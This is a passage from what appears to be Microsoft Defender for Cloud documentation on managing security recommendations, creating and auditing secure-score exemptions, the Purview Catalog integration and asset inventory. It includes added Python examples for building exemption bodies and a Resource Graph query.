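Run against the constructed data, sub-prod-01 ends up with Audit for the SQL auditing recommendation despite its own Disabled setting, and both subscriptions get Deny for secure transfer from the mg-prod assignment; to actually silence a recommendation you have to change it at the scope that keeps it active.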


[Screenshot: the ASC Default initiative assignment opened from the Security policy page, with an "Open in Azure Policy" action and a table of recommendations with columns Name, Resource type, Effect, Exempted resources and Additional parameters; the entries shown all use the Audit effect.]
Enable a security recommendation

Some recommendations might be disabled by default. For example, in the Azure Security Benchmark initiative, some recommendations are provided for you to enable only if they meet a specific regulatory or compliance requirement for your organization. For example: recommendations to encrypt data at rest with customer-managed keys, such as "Container registries should be encrypted with a customer-managed key (CMK)".


To enable a disabled recommendation and ensure it's assessed for your resources:

1. From Defender for Cloud's menu, open the Environment settings page.

2. Select the subscription or management group for which you want to enable a recommendation.

3. Open the Security policy page.

4. From the Default initiative section, select the relevant initiative.

5. Search for the recommendation that you want to enable, either by the search bar or filters.

6. Select the ellipses menu, then select Manage effect and parameters.

7. From the effect section, select Audit.

8. Select Save.


[Screenshot: the ASC Default assignment with the "Manage effect and parameters" pane open for "Automation account variables should be encrypted", offering the Audit, Disabled and Deny effects, a Reset to default action and Save.]

Note

Setting will take effect immediately, but recommendations will update based on their freshness interval (up to 12 hours).


Manage a security recommendation's settings

It may be necessary to configure additional parameters for some recommendations. As an example, diagnostic logging recommendations have a default retention period of 1 day. You can change the default value if your organizational security requirements require logs to be kept for more than that, for example: 30 days. The additional parameters column indicates whether a recommendation has associated additional parameters:

Default - the recommendation is running with default configuration

Configured - the recommendation's configuration is modified from its default values

None - the recommendation doesn't require any additional configuration

1. From Defender for Cloud's menu, open the Environment settings page.

2. Select the subscription or management group for which you want to configure a recommendation.

3. Open the Security policy page.

4. From the Default initiative section, select the relevant initiative.

5. Search for the recommendation that you want to configure.

Tip

To view all available recommendations with additional parameters, use the filters to show the Additional parameters column and then filter on Default.

6. Select the ellipses menu and select Manage effect and parameters.

7. From the additional parameters section, configure the available parameters with new values.

8. Select Save.


[Screenshot: the Manage effect and parameters pane for "Container CPU and memory limits should be enforced", opened from the ASC Default initiative. Effect: Audit (selected), Disabled, or Deny. Additional parameters: Max allowed CPU units in Kubernetes cluster (2); Max allowed memory bytes in Kubernetes cluster (64Gi); Kubernetes namespaces to exclude from monitoring of memory and CPU limits (["kube-system", "gatekeeper-system", "azure-arc", "azuredefender", "mdc"]); Kubernetes image to exclude from monitoring of all container related policies.]
Use the "reset to default" button to revert changes per the recommendation and restore the default value. 


Disable a security recommendation 


When your security policy triggers a recommendation that's irrelevant for your 
environment, you can prevent that recommendation from appearing again. To disable a 
recommendation, select an initiative and change its settings to disable relevant 
recommendations. 


The recommendation you want to disable will still appear if it's required for a regulatory standard you've applied with Defender for Cloud's regulatory compliance tools. Even if you've disabled a recommendation in the built-in initiative, a recommendation in the regulatory standard's initiative will still trigger the recommendation if it's necessary for compliance. You can't disable recommendations from regulatory standard initiatives. 


Learn more about managing security recommendations. 
1. From Defender for Cloud's menu, open the Environment settings page. 
2. Select the subscription or management group for which you want to disable a recommendation. 
Note 


Remember that a management group applies its settings to its subscriptions. 
If you disabled a subscription's recommendation, and the subscription 
belongs to a management group that still uses the same settings, then you 
will continue to receive the recommendation. The security policy settings will 
still be applied from the management level and the recommendation will still 
be generated. 

3. Open the Security policy page. 


4. From the Default initiative section, select the relevant initiative. 


5. Search for the recommendation that you want to disable, using the search bar or the filters. 


6. Select the ellipsis menu, then select Manage effect and parameters. 
7. From the effect section, select Disabled. 


8. Select Save. 


Note 


Setting will take effect immediately, but recommendations will update based 
on their freshness interval (up to 12 hours). 


Next steps 

This page explained security policies. For related information, see the following pages: 

• Learn how to set policies using PowerShell 
• Learn how to edit a security policy in Azure Policy 
• Learn how to set a policy across subscriptions or on management groups using Azure Policy 
• Learn how to enable Defender for Cloud on all subscriptions in a management group 


Exempting resources and recommendations from your secure score 

Article • 06/19/2023 


A core priority of every security team is to ensure analysts can focus on the tasks and incidents that matter to the organization. Defender for Cloud has many features for customizing the experience and making sure your secure score reflects your organization's security priorities. The exempt option is one such feature. 


When you investigate your security recommendations in Microsoft Defender for Cloud, 
one of the first pieces of information you review is the list of affected resources. 


Occasionally, a resource will be listed that you feel shouldn't be included. Or a 
recommendation will show in a scope where you feel it doesn't belong. The resource 
might have been remediated by a process not tracked by Defender for Cloud. The 
recommendation might be inappropriate for a specific subscription. Or perhaps your 
organization has decided to accept the risks related to the specific resource or 
recommendation. 


In such cases, you can create an exemption for a recommendation to: 


• Exempt a resource to ensure it isn't listed with the unhealthy resources in the future, and doesn't impact your secure score. The resource will be listed as not applicable and the reason will be shown as "exempted" with the specific justification you select. 

• Exempt a subscription or management group to ensure that the recommendation doesn't impact your secure score and won't be shown for the subscription or management group in the future. This relates to existing resources and any you create in the future. The recommendation will be marked with the specific justification you select for the scope that you selected. 


Availability 

Release state: Preview. The Azure Preview Supplemental Terms include additional legal terms that apply to Azure features that are in beta, preview, or otherwise not yet released into general availability. 

Pricing: This is a premium Azure Policy capability that's offered at no additional cost for customers with Microsoft Defender for Cloud's enhanced security features enabled. For other users, charges might apply in the future. 

Required roles and permissions: Owner or Resource Policy Contributor to create an exemption. To create a rule, you need permissions to edit policies in Azure Policy. Learn more in Azure RBAC permissions in Azure Policy. 

Limitations: Exemptions can be created only for recommendations included in Defender for Cloud's default initiative, Microsoft cloud security benchmark, or any of the supplied regulatory standard initiatives. Recommendations that are generated from custom initiatives can't be exempted. Learn more about the relationships between policies, initiatives, and recommendations. 

Clouds: Commercial clouds; National (Azure Government, Azure China 21Vianet) 


Define an exemption 


To fine-tune the security recommendations that Defender for Cloud makes for your subscriptions, management groups, or resources, you can create an exemption rule to: 

• Mark a specific recommendation as "mitigated" or "risk accepted". You can create recommendation exemptions for a subscription, multiple subscriptions, or an entire management group. 

• Mark one or more resources as "mitigated" or "risk accepted" for a specific recommendation. 


Note 

Exemptions can be created only for recommendations included in Defender for Cloud's default initiative, Microsoft cloud security benchmark or any of the supplied regulatory standard initiatives. Recommendations that are generated from any custom initiatives assigned to your subscriptions cannot be exempted. Learn more about the relationships between policies, initiatives, and recommendations. 

Tip 

You can also create exemptions using the API. For an example JSON, and an explanation of the relevant structures, see Azure Policy exemption structure. 

To create an exemption rule: 
1. Open the recommendations details page for the specific recommendation. 


2. From the toolbar at the top of the page, select Exempt. 


[Screenshot: the details page for "Azure DDoS Protection Standard should be enabled" (severity Medium, freshness interval 24 hours, 31 exempted resources), with an Exempt button and a View exemptions link. Description: Microsoft Defender for Cloud has discovered virtual networks with Application Gateway resources unprotected by the DDoS protection service. These resources contain public IPs. Enable mitigation of network volumetric and protocol attacks. The Affected resources section lists 4 unhealthy, 1 healthy, and 214 not applicable resources.]

3. In the Exempt pane: 

a. Select the scope for this exemption rule: 

• If you select a management group, the recommendation will be exempted from all subscriptions within that group. 

• If you're creating this rule to exempt one or more resources from the recommendation, choose "Selected resources" and select the relevant ones from the list. 

b. Enter a name for this exemption rule. 

c. Optionally, set an expiration date. 

d. Select the category for the exemption: 

• Resolved through 3rd party (mitigated): if you're using a third-party service that Defender for Cloud hasn't identified. 

Note 

When you exempt a recommendation as mitigated, you aren't given points towards your secure score. But because points aren't removed for the unhealthy resources, the result is that your score will increase. 

• Risk accepted (waiver): if you've decided to accept the risk of not mitigating this recommendation. 

e. Enter a description. 

f. Select Create. 


[Screenshot: the Exempt pane for "Azure DDoS Protection Standard should be enabled". The pane explains that you can exempt a recommendation from any scope so that it doesn't affect your secure score, that the resources' status will change to "not applicable", and that it might take up to 30 minutes for the exemption to take effect. It also notes that exemption is powered by Azure Policy and offered to Microsoft Defender for Cloud customers at no additional cost; other customers should follow Azure Policy pricing. Fields: Exemption scope (Selected management groups, Selected subscriptions, Selected resources), Exemption name, Set an expiration date, Exemption category (Resolved through 3rd party (Mitigated), Risk accepted (Waiver)), Exemption description.]


When the exemption takes effect (it might take up to 30 minutes): 

• The recommendation or resources won't impact your secure score. 

• If you've exempted specific resources, they'll be listed in the Not applicable tab of the recommendation details page. 

• If you've exempted a recommendation, it will be hidden by default on Defender for Cloud's recommendations page. This is because the default options of the Recommendation status filter on that page exclude Not applicable recommendations. The same is true if you exempt all recommendations in a security control. 

[Screenshot: the Recommendations page, where the Control status and Recommendation status filters have Active and Completed selected by default and Not applicable cleared.]

• The information strip at the top of the recommendation details page updates the number of exempted resources. 

[Screenshot: the information strip for "Azure DDoS Protection Standard should be enabled" showing severity Medium, a 24-hour freshness interval, and 35 exempted resources, with a View exemptions link.]


4. To review your exempted resources, open the Not applicable tab. 

[Screenshot: the Affected resources section showing 0 unhealthy, 2 healthy, and 5 not applicable resources. The Not applicable tab lists storage accounts with a Reason column reading "Exempt Mitigated" or "Exempt Waiver", and each row's ellipsis menu offers Manage exemption.]

The reason for each exemption is shown in the Reason column of the table. To modify or delete an exemption, select the ellipsis menu ("...") on the resource's row and choose Manage exemption. 

5. To review all of the exemption rules on your subscription, select View exemptions from the information strip. 
Important 


To see the specific exemptions relevant to one recommendation, filter the list 
according to the relevant scope and recommendation name. 


[Screenshot: the Exemptions page for the ASC DEMO scope, filtered by scope and exemption category, with counters for total exemptions (43), exemptions approaching expiration within the next 7 days (0), and expired exemptions. The table has the columns Policy exemption, Assignment, Scope, Exemption category, and Expiration date; each row's menu offers Edit exemption, View assignment, and View compliance.]


Tip 


Alternatively, use Azure Resource Graph to find recommendations with 
exemptions. 


Monitor exemptions created in your 
subscriptions 


As explained earlier on this page, exemption rules are a powerful tool providing granular 
control over the recommendations affecting resources in your subscriptions and 
management groups. 


To keep track of how your users are exercising this capability, we've created an Azure 
Resource Manager (ARM) template that deploys a Logic App Playbook and all necessary 
API connections to notify you when an exemption has been created. 


• To learn more about the playbook, see the tech community blog post How to keep track of Resource Exemptions in Microsoft Defender for Cloud. 

• You'll find the ARM template in the Microsoft Defender for Cloud GitHub repository. 

• To deploy all the necessary components, use this automated process. 
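The exemption rule defined above (scope, name, expiration date, category, description) is stored by Azure Policy as a policyExemptions resource, and the Exemptions page and the playbook in this section both exist to keep those resources under review. The following Python is an added example, not code from the Defender for Cloud documentation or from the product: it builds the request body that the Exempt pane submits for a single recommendation, and audits a list of existing exemptions into the same total / approaching expiration / expired buckets the Exemptions page shows. The subscription, resource group, reference ID and assignment name (SecurityCenterBuiltIn is assumed to be the name of the default initiative's assignment in your tenant) are constructed placeholders, and the sample records are constructed too.

```python
# Added example, not code from the Defender for Cloud docs or the product: build the
# Azure Policy exemption body the Exempt pane submits, and audit existing exemptions the
# way the Exemptions page summarizes them. All IDs and names below are constructed.
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# Azure Policy accepts exactly these two exemptionCategory values; the Exempt pane
# labels them "Risk accepted (Waiver)" and "Resolved through 3rd party (Mitigated)".
CATEGORY_WAIVER = "Waiver"
CATEGORY_MITIGATED = "Mitigated"
ALLOWED_CATEGORIES = (CATEGORY_WAIVER, CATEGORY_MITIGATED)


def build_exemption(name: str, policy_assignment_id: str,
                    policy_definition_reference_ids: List[str],
                    category: str, description: str,
                    expires_on: Optional[datetime] = None) -> dict:
    """Return a Microsoft.Authorization/policyExemptions resource body.

    policy_definition_reference_ids narrows the exemption to individual definitions of
    the assigned initiative (one recommendation each). It is required here on purpose:
    Azure Policy treats an omitted list as "exempt every definition in the assignment",
    which on the Defender for Cloud default initiative silences every recommendation.
    """
    if category not in ALLOWED_CATEGORIES:
        raise ValueError(f"exemptionCategory must be one of {ALLOWED_CATEGORIES}, got {category!r}")
    if not policy_definition_reference_ids:
        raise ValueError("refusing to build an exemption that covers the whole assignment")
    if expires_on is not None and expires_on.tzinfo is None:
        raise ValueError("expires_on must be timezone-aware; Azure stores the value in UTC")
    properties = {
        "displayName": name,
        "description": description,
        "policyAssignmentId": policy_assignment_id,
        "policyDefinitionReferenceIds": list(policy_definition_reference_ids),
        "exemptionCategory": category,
    }
    if expires_on is not None:
        properties["expiresOn"] = expires_on.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return {"type": "Microsoft.Authorization/policyExemptions", "name": name, "properties": properties}


@dataclass
class ExemptionRecord:
    """One row as the Exemptions page lists it (a constructed shape, not an API type)."""
    name: str
    scope: str
    category: str
    expires_on: Optional[datetime]  # None: the rule never expires


def audit_exemptions(records: List[ExemptionRecord], now: datetime, window_days: int = 7) -> dict:
    """Bucket exemptions into expired, approaching expiration, never expiring and bad category."""
    horizon = now + timedelta(days=window_days)
    result = {"total": len(records), "expired": [], "approaching_expiration": [],
              "no_expiry": [], "invalid_category": []}
    for rec in records:
        if rec.category not in ALLOWED_CATEGORIES:
            result["invalid_category"].append(rec.name)
        if rec.expires_on is None:
            result["no_expiry"].append(rec.name)        # permanent risk acceptance: review it
        elif rec.expires_on <= now:
            result["expired"].append(rec.name)          # no longer hides the recommendation
        elif rec.expires_on <= horizon:
            result["approaching_expiration"].append(rec.name)
    return result


# Constructed sample data reusing the naming style seen on the Exemptions page.
NOW = datetime(2023, 6, 19, tzinfo=timezone.utc)
SAMPLE_RECORDS = [
    ExemptionRecord("ASC-sqlDbEncryptionMonitoring", "/subscriptions/sub-demo", CATEGORY_WAIVER, NOW + timedelta(days=3)),
    ExemptionRecord("ASC-azurePolicyAddonStatus", "/subscriptions/sub-demo/resourceGroups/asc-rg", CATEGORY_WAIVER, NOW - timedelta(days=1)),
    ExemptionRecord("ASC-vmssExtension-installLogA", "/subscriptions/sub-demo", CATEGORY_MITIGATED, None),
    ExemptionRecord("ASC-vulnerabilityAssessment", "/subscriptions/sub-demo", CATEGORY_MITIGATED, NOW + timedelta(days=90)),
]

if __name__ == "__main__":
    # Assumed: SecurityCenterBuiltIn is the default initiative's assignment name;
    # "ddosProtectionMonitoring" is a placeholder policy definition reference ID.
    body = build_exemption(
        name="ASC-ddosProtectionMonitoring",
        policy_assignment_id="/subscriptions/sub-demo/providers/Microsoft.Authorization/policyAssignments/SecurityCenterBuiltIn",
        policy_definition_reference_ids=["ddosProtectionMonitoring"],
        category=CATEGORY_WAIVER,
        description="Volumetric protection is provided upstream; reviewed by SecOps",
        expires_on=NOW + timedelta(days=180),
    )
    print(body)
    print(audit_exemptions(SAMPLE_RECORDS, NOW))
```

Two checks are worth keeping in any automation around exemptions: the builder refuses a body with no policyDefinitionReferenceIds, because Azure Policy treats that as exempting every definition in the assignment rather than one recommendation, and the audit separates rules with no expiration date, which are permanent risk acceptances that never show up in the "approaching expiration" counter on the Exemptions page.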


Use the inventory to find resources that have 
exemptions applied 


The asset inventory page of Microsoft Defender for Cloud provides a single page for 
viewing the security posture of the resources you've connected to Defender for Cloud. 


Learn more in Explore and manage your resources with asset inventory. 


The inventory page includes many filters to let you narrow the list of resources to the 
ones of most interest for any given scenario. One such filter is the Contains exemptions. 
Use this filter to find all resources that have been exempted from one or more 
recommendations. 


[Screenshot: the Inventory page with the Contains exemptions filter added; its values are No (171) and Yes (4).]


Find recommendations with exemptions using 
Azure Resource Graph 


Azure Resource Graph (ARG) provides instant access to resource information across your 
cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick 
and efficient way to query information across Azure subscriptions programmatically or 
from within the Azure portal. 


To view all recommendations that have exemption rules: 


1. Open Azure Resource Graph Explorer. 


[Screenshot: searching the Azure portal for Resource Graph Explorer.]


2. Enter the following query and select Run query. 


Kusto 

securityresources 
| where type == "microsoft.security/assessments" 
// Get recommendations in useful format 
| project 
    ['TenantID'] = tenantId, 
    ['SubscriptionID'] = subscriptionId, 
    ['AssessmentID'] = name, 
    ['DisplayName'] = properties.displayName, 
    // Positions 7 and 8 of the split resource ID are the type and name of a top-level 
    // ARM resource; for child resources (for example SQL databases) they name the parent 
    ['ResourceType'] = tolower(split(properties.resourceDetails.Id,"/").[7]), 
    ['ResourceName'] = tolower(split(properties.resourceDetails.Id,"/").[8]), 
    ['ResourceGroup'] = resourceGroup, 
    ['ContainsNestedRecom'] = tostring(properties.additionalData.subAssessmentsLink), 
    ['StatusCode'] = properties.status.code, 
    ['StatusDescription'] = properties.status.description, 
    ['PolicyDefID'] = properties.metadata.policyDefinitionId, 
    ['Description'] = properties.metadata.description, 
    ['RecomType'] = properties.metadata.assessmentType, 
    ['Remediation'] = properties.metadata.remediationDescription, 
    ['Severity'] = properties.metadata.severity, 
    ['Link'] = properties.links.azurePortal 
// Exempted resources carry "Exempt" in the status description ('contains' is case-insensitive) 
| where StatusDescription contains "Exempt" 
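An added example that is not part of the Defender for Cloud documentation: the column shaping of the query above implemented in Python over assessment rows of the shape the microsoft.security/assessments table returns, so that exported results can be post-processed offline. It also shows the limit of reading positions 7 and 8 of the split resource ID: for a child resource such as a SQL database, those positions hold the parent server's type and name, so an exemption report built from them names the wrong resource. The rows, subscription ID, resource names and status descriptions are constructed for the example.

```python
# Added example, not from the docs: post-process Resource Graph assessment rows the way
# the query above does, and show why its fixed split(...)[7] / [8] positions name only the
# parent of a child resource. Rows below are constructed to match the shape of the
# microsoft.security/assessments table; the IDs and names are placeholders.
from typing import Dict, List, Tuple


def query_style_split(resource_id: str) -> Tuple[str, str]:
    """Positions 7 and 8 of split(id, "/"), exactly as the Resource Graph query reads them."""
    parts = resource_id.split("/")
    return parts[7].lower(), parts[8].lower()


def arm_type_and_name(resource_id: str) -> Tuple[str, str]:
    """Full ARM resource type (namespace/type[/childType...]) and the leaf resource name.

    Unlike the fixed positions, this keeps child resources such as SQL databases distinct
    from their parent server, so an exemption report names the resource actually exempted.
    """
    parts = [p for p in resource_id.split("/") if p]
    if "providers" not in parts:
        # Subscription-scoped IDs (/subscriptions/<id>) have no provider segment.
        return parts[0].lower(), parts[-1].lower()
    after = parts[parts.index("providers") + 1:]   # namespace, type, name[, childType, childName]...
    namespace, pairs = after[0], after[1:]
    if len(pairs) < 2 or len(pairs) % 2:
        raise ValueError(f"malformed ARM resource ID: {resource_id}")
    types, names = pairs[0::2], pairs[1::2]
    return (namespace + "/" + "/".join(types)).lower(), names[-1].lower()


def exempted_assessments(rows: List[dict]) -> List[Dict[str, str]]:
    """Project the columns the query projects and keep only rows whose status says Exempt."""
    out = []
    for row in rows:
        props = row["properties"]
        description = props.get("status", {}).get("description") or ""
        if "exempt" not in description.lower():     # KQL 'contains' is case-insensitive
            continue
        rtype, rname = arm_type_and_name(props["resourceDetails"]["Id"])
        out.append({
            "SubscriptionID": row["subscriptionId"],
            "AssessmentID": row["name"],
            "DisplayName": props["displayName"],
            "ResourceType": rtype,
            "ResourceName": rname,
            "StatusCode": props["status"]["code"],
            "StatusDescription": description,
            "Severity": props["metadata"]["severity"],
        })
    return out


SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"
VM_ID = SUB + "/resourceGroups/prod-rg/providers/Microsoft.Compute/virtualMachines/web01"
SQL_DB_ID = SUB + "/resourceGroups/prod-rg/providers/Microsoft.Sql/servers/sqlsrv1/databases/db1"
STORAGE_ID = SUB + "/resourceGroups/prod-rg/providers/Microsoft.Storage/storageAccounts/logs001"


def _row(assessment_id, display_name, resource_id, code, description, severity):
    """Constructed assessment row in the shape the securityresources table returns."""
    return {"name": assessment_id, "subscriptionId": SUB.split("/")[-1], "resourceGroup": "prod-rg",
            "properties": {"displayName": display_name,
                           "resourceDetails": {"Id": resource_id},
                           "status": {"code": code, "description": description},
                           "metadata": {"severity": severity}}}


# Constructed rows: one Waiver, one Mitigated (on a child resource), one genuinely unhealthy.
SAMPLE_ROWS = [
    _row("a1", "Azure DDoS Protection Standard should be enabled", VM_ID,
         "NotApplicable", "Exempt Waiver", "Medium"),
    _row("a2", "Vulnerability assessment should be enabled on your SQL servers", SQL_DB_ID,
         "NotApplicable", "Exempt Mitigated", "High"),
    _row("a3", "Storage accounts should restrict network access", STORAGE_ID,
         "Unhealthy", "Public network access is enabled", "Medium"),
]

if __name__ == "__main__":
    for item in exempted_assessments(SAMPLE_ROWS):
        print(item)
    print(query_style_split(SQL_DB_ID))   # ('servers', 'sqlsrv1'): the database is lost
    print(arm_type_and_name(SQL_DB_ID))   # ('microsoft.sql/servers/databases', 'db1')
```

The same caveat applies to the query itself: the fixed positions are fine for top-level resources, but when you audit exemptions on child resources, derive the type and name from the segments after "providers" as arm_type_and_name() does, or the report will attribute the exemption to the parent.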


Learn more in the following pages: 

• Learn more about Azure Resource Graph. 
• How to create queries with Azure Resource Graph Explorer 
• Kusto Query Language (KQL) 

Next steps 

In this article, you learned how to exempt a resource from a recommendation so that it doesn't impact your secure score. For more information about secure score, see: 

• Secure score in Microsoft Defender for Cloud 


Leverage Purview Catalog to protect sensitive data (Preview) 

Article • 03/28/2023 

Microsoft Purview Data Catalog, Microsoft's data governance service, provides rich insights into the sensitivity of your data. With automated data discovery, sensitive data classification, and end-to-end data lineage, Microsoft Purview Data Catalog helps organizations manage and govern data in hybrid and multicloud environments. 


Microsoft Defender for Cloud customers using Microsoft Purview Data Catalog can 
benefit from another important layer of metadata in alerts and recommendations: 
information about any potentially sensitive data involved. This knowledge helps solve 
the triage challenge and ensures security professionals can focus their attention on 
threats to sensitive data. 


This page explains the integration of Microsoft Purview Data Catalog in Defender for 
Cloud. 


You can learn more by watching this video from the Defender for Cloud in the Field video series: 

• Integrate Microsoft Purview with Microsoft Defender for Cloud 


Note 

Microsoft Defender for Cloud also provides data sensitivity context by enabling the sensitive data discovery (preview). The integration between Microsoft Purview Data Catalog and Microsoft Defender for Cloud described in this page offers a complementary source of data context for resources not covered by the sensitive data discovery feature. 

• Purview Catalog provides data context only for resources in subscriptions not onboarded to the sensitive data discovery feature, or for resource types not supported by that feature. 

• Data context provided by Purview Catalog is provided as is and does not take the data sensitivity settings into account. 

Learn more in Data-aware security posture (preview). 


Availability 

Release state: Preview. The Azure Preview Supplemental Terms include additional legal terms that apply to Azure features that are in beta, preview, or otherwise not yet released into general availability. 

Pricing: You'll need a Microsoft Purview account to create the data sensitivity classifications and run the scans. The integration between Purview and Microsoft Defender for Cloud doesn't incur extra costs, but the data is shown in Microsoft Defender for Cloud only for enabled plans. 

Required roles and permissions: Security admin and Security contributor 

Clouds: Commercial clouds (Regions: East US, East US 2, West US 2, West Central US, South Central US, Canada Central, Brazil South, North Europe, West Europe, UK South, Southeast Asia, Central India, Australia East); Azure Government; Azure China 21Vianet (Partial: Subset of alerts and vulnerability assessment for SQL servers. Behavioral threat protections aren't available.) 


The triage problem and Defender for Cloud's 
solution 


Security teams regularly face the challenge of how to triage incoming issues. 


Defender for Cloud includes two mechanisms to help prioritize recommendations and 
security alerts: 


• For recommendations, we've provided security controls to help you understand how important each recommendation is to your overall security posture. Defender for Cloud includes a secure score value for each control to help you prioritize your security work. Learn more in Security controls and their recommendations. 

• For alerts, we've assigned severity labels to each alert to help you prioritize the order in which you attend to each alert. Learn more in How are alerts classified?. 

However, where possible, you'd want to focus the security team's efforts on risks to the organization's data. If two recommendations have equal impact on your secure score, but one relates to a resource with sensitive data, ideally you'd include that knowledge when determining prioritization. 

Microsoft Purview's data sensitivity classifications and data sensitivity labels provide that knowledge. 


Discover resources with sensitive data 


To provide information about discovered sensitive data and help ensure you have that information when you need it, Defender for Cloud displays information from Microsoft Purview in multiple locations. 

Purview Catalog scans produce insights into the nature of the sensitive information so you can take action to protect that information: 

• If a resource is scanned by multiple Microsoft Purview accounts, the information shown in Defender for Cloud relates to the most recent scan. 

• Classifications and labels are shown for resources that were scanned within the last three months. 

• Purview Catalog adds data sensitivity context only for resources not covered by the sensitive data discovery (preview) feature in Defender for Cloud. 


Alerts and recommendations pages 


When you're reviewing a recommendation or investigating an alert, the information 
about any potentially sensitive data involved is included on the page. You can also filter 
the list of alerts by Data sensitivity classifications and Data sensitivity labels to help 
you focus on the alerts that relate to sensitive data. 


This vital layer of metadata helps solve the triage challenge and ensures your security 
team can focus its attention on the threats to sensitive data. 


Inventory filters 


The asset inventory page has a collection of powerful filters to group your resources with outstanding alerts and recommendations according to the criteria relevant for any scenario. These filters include Data sensitivity classifications and Data sensitivity labels. Use these filters to evaluate the security posture of resources on which Purview Catalog has discovered sensitive data. 


[Screenshot: the Inventory page with a Data sensitivity classifications filter. Values offered include World Cities, Person's Name, Email Address, Country/Region, Credit Card Number, EU Phone Number (Deprecated), IP Address, Personal IP Address, U.S. Phone Number, U.S. State Name, EU Debit Card Number, Canada Social Insurance Number, Date of Birth, U.S. Social Security Number (SSN), International Banking Account Number (IBAN), and EU National Identification Number. Resources such as purviewadls, ninjasql, ticketreservation, and purviewninjasql are listed with the Secret label.]


Resource health 


When you select a single resource - whether from an alert, recommendation, or the 
inventory page - you reach a detailed health page showing a resource-centric view with 
the important security information related to that resource. 


The resource health page provides a snapshot view of the overall health of a single 
resource. You can review detailed information about the resource and all 
recommendations that apply to that resource. Also, if you're using any of the Microsoft 
Defender plans, you can see outstanding security alerts for that specific resource too. 


When reviewing the health of a specific resource, you'll see the Purview Catalog 
information on this page and can use it to determine what data has been discovered on 
this resource. To explore more details and see the list of sensitive files, select the link to 
launch Microsoft Purview Data Catalog. 


[Screenshot: the Resource health (Preview) page for a resource in the Cyber SOC subscription (Azure, eastus, status Ready), with counters for active recommendations and active alerts, a Security value section listing Data classifications (Person's Name (10), World Cities (5), Country/Region (4), and 9 more) and the Purview account purviewninjacatalog, and an Alerts tab listing several Suspected brute-force attack attempt alerts (MITRE ATT&CK tactic: Pre-attack) and a Login from an unusual location alert (Initial Access).]

Note 

• If the data in the resource is updated and the update affects the resource classifications and labels, Defender for Cloud reflects those changes only after Purview Catalog rescans the resource. 

• If the Microsoft Purview account is deleted, the resource classifications and labels are still available in Defender for Cloud. 

• Defender for Cloud updates the resource classifications and labels within 24 hours of the Purview Catalog scan. 


Attack path 


Some of the attack paths consider resources that contain sensitive data, such as "AWS S3 Bucket with sensitive data is publicly accessible", based on Purview Catalog scan results. 

Security explorer 

The Cloud Map shows resources that "contain sensitive data", based on Purview scan results. You can use resources with this label to explore the map. 

• To see the classification and labels of the resource, go to the inventory. 

• To see the list of classified files in the resource, go to the Microsoft Purview compliance portal. 


Learn more 


You can check out the following blog: 

• Secure sensitive data in your cloud resources. 

Next steps 

For related information, see: 

• What is Microsoft Purview? 
• Microsoft Purview's supported data sources and file types and supported data stores 
• Microsoft Purview deployment best practices 
• How to label your data in Microsoft Purview 


Use asset inventory to manage your resources' security posture 

Article • 06/19/2023 

The asset inventory page of Microsoft Defender for Cloud shows the security posture of the resources you've connected to Defender for Cloud. Defender for Cloud periodically analyzes the security state of resources connected to your subscriptions to identify potential security issues and provides you with active recommendations. Active recommendations are recommendations that can be resolved to improve your security posture. 


Use this view and its filters to address such questions as: 


• Which of my subscriptions with Defender plans enabled have outstanding recommendations? 

• Which of my machines with the tag 'Production' are missing the Log Analytics agent? 

• How many of my machines tagged with a specific tag have outstanding recommendations? 

• Which machines in a specific resource group have a known vulnerability (using a CVE number)? 


The security recommendations on the asset inventory page are also shown in the 
Recommendations page, but here they're shown according to the affected resource. 


Learn more about implementing security recommendations. 


Availability 

Release state: General availability (GA) 

Pricing: Free. Some features of the inventory page, such as the software inventory, require paid solutions to be in place. 

Required roles and permissions: All users 

Clouds: Commercial clouds; National (Azure Government, Azure China 21Vianet). Software inventory isn't currently supported in national clouds. 


What are the key features of asset inventory? 


The inventory page provides the following tools: 


[Screenshot: the Inventory page showing 8 subscriptions, with the filters Subscriptions, Resource Groups, Resource types, Defender for Cloud, Monitoring agent, Environment, Recommendations, and Installed applications; summary counters Total resources (1904), Unhealthy resources (318), Unmonitored resources (0), and Unregistered subscriptions (0); and a table with the columns Resource name, Resource type, Subscription, Monitoring agent, Defender for Cloud, and Recommendations.]


1 - Summaries 


Before you define any filters, a prominent strip of values at the top of the inventory view 
shows: 


• Total resources: The total number of resources connected to Defender for Cloud. 

• Unhealthy resources: Resources with active security recommendations that you 
can implement. Learn more about implementing security recommendations. 

• Unmonitored resources: Resources with agent monitoring issues - they have the 
Log Analytics agent deployed, but the agent isn't sending data or has other health 
issues. 

• Unregistered subscriptions: Any subscription in the selected scope that hasn't yet 
been connected to Microsoft Defender for Cloud. 


2 - Filters 


The multiple filters at the top of the page provide a way to quickly refine the list of 
resources according to the question you're trying to answer. For example, if you wanted 
to know which of your machines with the tag 'Production' are missing the Log Analytics 
agent, you can filter the list for Agent monitoring:"Not installed" and Tags:"Production". 


As soon as you've applied filters, the summary values are updated to relate to the query 
results. 


3 - Export and asset management tools 


Export options - Inventory includes an option to export the results of your selected filter 
options to a CSV file. You can also export the query itself to Azure Resource Graph 
Explorer to further refine, save, or modify the Kusto Query Language (KQL) query. 


Tip 


The KQL documentation provides a database with some sample data together with 
some simple queries to get the "feel" for the language. Learn more in this KQL 
tutorial. 


Asset management options - When you've found the resources that match your 
queries, inventory provides shortcuts for operations such as: 


• Assign tags to the filtered resources - select the checkboxes alongside the 
resources you want to tag. 

• Onboard new servers to Defender for Cloud - use the Add non-Azure servers 
toolbar button. 

• Automate workloads with Azure Logic Apps - use the Trigger Logic App button to 
run a logic app on one or more resources. Your logic apps have to be prepared in 
advance, and accept the relevant trigger type (HTTP request). Learn more about 
logic apps. 


How does asset inventory work? 


Asset inventory utilizes Azure Resource Graph (ARG), an Azure service that lets you 
query Defender for Cloud's security posture data across multiple subscriptions. 


ARG is designed to provide efficient resource exploration with the ability to query at 
scale. 


You can use Kusto Query Language (KQL) in the asset inventory to quickly produce deep 
insights by cross-referencing Defender for Cloud data with other resource properties. 


How to use asset inventory 


1. From Defender for Cloud's sidebar, select Inventory. 


2. Use the Filter by name box to display a specific resource, or use the filters to focus 
on specific resources. 


By default, the resources are sorted by the number of active security 
recommendations. 
Important 


The options in each filter are specific to the resources in the currently selected 
subscriptions and your selections in the other filters. 


For example, if you've selected only one subscription, and the subscription 
has no resources with outstanding security recommendations to remediate (0 
